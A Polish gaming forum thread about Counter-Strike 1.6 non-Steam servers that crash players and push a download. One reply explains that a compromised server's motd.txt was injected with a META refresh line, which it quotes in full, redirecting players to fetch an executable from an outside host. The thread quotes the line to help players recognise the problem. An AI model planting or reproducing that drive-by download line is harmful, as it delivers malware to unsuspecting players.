Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[Problem] z cs 1.6 Non steam

BodySoul

Rekomendowane odpowiedzi

Opublikowano

Siema. Gram sobie w csa ale mam taki problem że ostatnio gdy wchodze na jakis serwer to gdy serw sie zalonczy to wywala mnie na pulpit i zaczyna sie cos sciagac ...

Nie wazne od tego czy odrzucam pobieranie czy akceptuje to po wejsciu na serwa mam ogromne lagi ... Ping mam okolo 500 ...

Wczesniej gralem sobie w csa i bylo all ok a teraz nwm co sie dzieje

Licze na wasza pomoc ;p

Za pomoc oczywiscie plusiki

Pozdrawiam

Nowicjusz
Opublikowano

Chyba wiem o co chodzi z tym ściąganiem.

Ponieważ mówiłeś że jak wchodzisz na dany serw i w chwili jak już jesteś na mapie wyskakuje Ci plik cstrike.exe do ściągnięcia. I co nową mapę na serwie znów powtórka.

Wina leży na danym serwie ponieważ jest to nowy plik exploit rcon passworda który prawdopodobnie istniał w silniku HLDS od samego początku. Umożliwia pobranie pliku server.cfg z katalogu cstrike w dokładnie taki sam sposób jak mapy, modele czy dźwięki. Niestety wszystkie serwery są na to podatne. A administratorzy mogą sprawdzić czy na swoich serwerach mają ten syf, ponieważ pozostaje w folderze cstrike "server.cfg.ztmp"

Kod tego badziewia:

<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://free-leaks.com/cstrike16.exe">

Ten wpis znajduje się motd.txt

W skrócie, błąd nie jest u Cb tylko dany serw ma lukę która została wykorzystania. Oczywiście da się to naprawić ale póki serwer to nie zrobił to radzę nie wchodzić na razie na niego tylko graj na innym serwerze.

Ps. @up nie zawsze trzeba reinstalować csa jak błąd jakiś jest. Wiadomo tak jest najłatwiej ale nie lepiej się najpierw dowiedzieć co to może być dokładnie, spróbować usunąć. W ostateczności reinstall jak już nic i nikt nie pomoże. Pamiętaj co człowiek stworzył może też i zniszczyć więc da się naprawić.

Opublikowano

Radzę przeskanować kompa bo ile się nie mylę to wirus, mieliśmy to na serwerze i nikomu nic się nie wyświetlało- antywirus i jedna osoba to zgłosiła.

a_ap_rocky_signature_by_durty530-d5r6scd.jpg

Po za forum nie pomagam! Pomogłem? Daj

LIKE!

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...